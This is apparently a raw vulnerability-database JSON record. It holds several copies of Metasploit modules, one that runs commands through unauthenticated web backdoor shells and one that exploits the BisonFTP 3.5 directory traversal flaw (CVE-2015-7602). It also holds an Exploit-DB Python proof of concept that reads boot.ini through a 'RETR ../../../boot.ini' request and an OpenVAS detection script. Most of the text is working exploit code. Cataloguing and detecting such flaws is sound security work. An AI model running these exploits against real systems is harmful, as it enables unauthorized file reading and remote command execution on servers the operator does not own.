https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Simple Backdoor Shell Remote Code Execution',\n 'Description' => %q{\n This module exploits unauthenticated simple web backdoor shells by leveraging the\n common backdoor shell's vulnerable parameter to execute commands. The SecLists project of\n Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells\n which is categorized under Payloads.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Jay Turla <@shipcod3>',\n ],\n 'References' =>\n [\n [ 'URL', 'http://resources.infosecinstitute.com/checking-out-backdoor-shells/' ],\n [ 'URL', 'https://github.com/danielmiessler/SecLists/tree/master/Payloads' ] # Most PHP Web Backdoors Listed\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 2000,\n 'BadChars' => '',\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd'\n }\n },\n 'Platform' => %w{ unix win },\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n ['backdoor / Unix', { 'Platform' => 'unix' } ],\n ['backdoor / Windows', { 'Platform' => 'win' } ]\n ],\n 'DisclosureDate' => 'Sep 08 2015',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path of a backdoor shell', 'cmd.php']),\n OptString.new('VAR', [true, 'The command variable', 'cmd']),\n OptEnum.new('METHOD', [true, 'HTTP Method', 'GET', ['GET', 'POST', 'PUT']])\n ])\n end\n\n def check\n test = Rex::Text.rand_text_alpha(8)\n http_send_command(test)\n if res && res.body =~ /#{test}/\n return Exploit::CheckCode::Vulnerable\n end\n return Exploit::CheckCode::Safe\n end\n\n def http_send_command(cmd)\n res = send_request_cgi({\n 'method' => datastore['METHOD'],\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => {\n datastore['VAR'] => cmd\n }\n })\n unless res && res.code == 200\n fail_with(Failure::Unknown, \"Failed to execute the command.\")\n end\n res\n end\n\n def exploit\n http_send_command(payload.encoded)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-23T20:04:18", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 103}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "59a376e9ba7a4108fbda54f00d9010b2", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2019-10-03T16:47:49", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-23T22:07:07", "history": [], "viewCount": 86, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-23T22:07:07"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-10-23T22:07:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-23T22:07:07", "differentElements": ["modified", "published"], "edition": 104}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6ca196d549fd238df143ba70fad1099a", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-11-22T06:36:24", "history": [], "viewCount": 86, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-11-22T06:36:24"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-11-22T06:36:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-22T06:36:24", "differentElements": ["modified", "published"], "edition": 105}], "viewCount": 87, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-11-22T08:34:01"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-11-22T08:34:01"}, "vulnersScore": 5.7}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:14:44", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in BisonWare BisonFTP 3.5 allows remote attackers to read arbitrary files via a ../ (dot dot slash) in a RETR command.", "modified": "2015-10-13T16:52:00", "id": "CVE-2015-7602", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7602", "published": "2015-09-29T19:59:00", "title": "CVE-2015-7602", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-04T07:52:44", "bulletinFamily": "exploit", "description": "BisonWare BisonFTP Server 3.5 - Directory Traversal Vulnerability. CVE-2015-7602. Remote exploit for windows platform", "modified": "2015-09-28T00:00:00", "published": "2015-09-28T00:00:00", "id": "EDB-ID:38341", "href": "https://www.exploit-db.com/exploits/38341/", "type": "exploitdb", "title": "BisonWare BisonFTP Server 3.5 - Directory Traversal Vulnerability", "sourceData": "#!/usr/bin/python\r\n# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability\r\n# author: Jay Turla <@shipcod3>\r\n# tested on Windows XP Service Pack 3 - English\r\n# software link: https://www.exploit-db.com/apps/081331edfc143738a60e029192b5986e-BisonFTPServer.rar\r\n# description: BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC) \r\n\r\nfrom ftplib import FTP\r\n\r\nftp = FTP(raw_input(\"Target IP: \")) \r\nftp.login() \r\nftp.retrbinary('RETR ../../../boot.ini', open('boot.ini.txt', 'wb').write)\r\nftp.close()\r\nfile = open('boot.ini.txt', 'r')\r\nprint \"[**] Printing what's inside boot.ini\\n\"\r\nprint \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"\r\nprint file.read()\r\nprint \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/38341/"}], "openvas": [{"lastseen": "2019-05-29T18:36:08", "bulletinFamily": "scanner", "description": "This host is running BisonWare BisonFTP Server\n and is prone to directory traversal vulnerability.", "modified": "2019-02-07T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310805753", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805753", "title": "BisonWare BisonFTP Server Directory Traversal Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bisonware_bisonftp_server_dir_trav_vuln.nasl 13517 2019-02-07 07:51:12Z mmartin $\n#\n# BisonWare BisonFTP Server Directory Traversal Vulnerability\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bisonware:bison_ftp_server\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805753\");\n script_version(\"$Revision: 13517 $\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-07 08:51:12 +0100 (Thu, 07 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 12:41:58 +0530 (Tue, 29 Sep 2015)\");\n script_cve_id(\"CVE-2015-7602\");\n script_name(\"BisonWare BisonFTP Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running BisonWare BisonFTP Server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send the crafted directory traversal attack\n request and check whether it is able to read the system file or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in handling of\n file names. It does not properly sanitise filenames containing directory traversal\n sequences that are received from an FTP server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to read arbitrary files on the affected application.\");\n\n script_tag(name:\"affected\", value:\"BisonWare BisonFTP Server version 3.5.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\n Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the\n product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/38341\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"FTP\");\n script_dependencies(\"gb_bisonware_bisonftp_server_detect.nasl\");\n script_mandatory_keys(\"BisonWare/Ftp/Installed\");\n script_require_ports(\"Services/ftp\", 21);\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nftpPort = get_app_port(cpe:CPE);\nif(!ftpPort){\n exit(0);\n}\n\nsoc = open_sock_tcp(ftpPort);\nif(!soc){\n exit(0);\n}\n\nkb_creds = ftp_get_kb_creds();\nuser = kb_creds[\"login\"];\npass = kb_creds[\"pass\"];\n\nlogin_details = ftp_log_in(socket:soc, user:user, pass:pass);\nif(!login_details)\n{\n close(soc);\n exit(0);\n}\n\nftpPort2 = ftp_get_pasv_port(socket:soc);\nif(!ftpPort2)\n{\n close(soc);\n exit(0);\n}\n\nsoc2 = open_sock_tcp(ftpPort2, transport:get_port_transport(ftpPort));\nif(!soc2)\n{\n close(soc);\n exit(0);\n}\n\nfiles = traversal_files( \"Windows\" );\n\nforeach pattern( keys( files ) ) {\n\n file = files[pattern];\n file = \"../../../\" + file;\n req = string(\"RETR \", file);\n send(socket:soc, data:string(req, \"\\r\\n\"));\n\n res = ftp_recv_data(socket:soc2);\n\n if( res && match = egrep( string:res, pattern:\"(\" + pattern + \"|\\WINDOWS)\", icase:TRUE ) ) {\n report = \"Used request: \" + req + '\\n';\n report += \"Received data: \" + match;\n security_message(port:ftpPort, data:report);\n close(soc2);\n close(soc);\n exit(0);\n }\n}\n\nclose(soc);\nclose(soc2);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}]}